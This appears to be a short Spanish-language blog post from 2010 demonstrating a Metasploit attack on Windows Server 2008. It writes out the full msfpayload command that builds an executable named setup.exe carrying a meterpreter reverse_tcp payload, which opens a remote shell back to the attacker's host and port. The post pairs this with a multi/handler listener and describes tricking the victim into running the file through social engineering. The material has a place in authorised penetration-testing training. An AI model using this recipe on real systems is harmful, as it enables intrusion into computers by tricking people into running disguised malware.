miércoles, 26 de mayo de 2010

msf>multi/handler>creando .exe con payload

msf>multi/handler>creando .exe con payload: "
msf>multi/handler>creando .exe con payload

Host atacante:
Backtrack 4
Host victima: Windows Server 2008 / Firewall on!
---------------------------------------------------------------------------
Creando ejecutable:
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST:192.168.182.1 LPORT=4444 X > /root/setup.exe
--------------------------------------------------------------------------
Exploit : multi/handler
Payload : windows/meterpreter/reverse_tcp

Este video muestro la forma de de ingresar a un sistema Windows Server 2008, aqui lo que hacemos es utilizar un poco de ingienieria social y hacer que el host victima ejecute el .exe para que se establesca la conexion.

Mas definicion -----------------> Video

"

No hay comentarios:

Publicar un comentario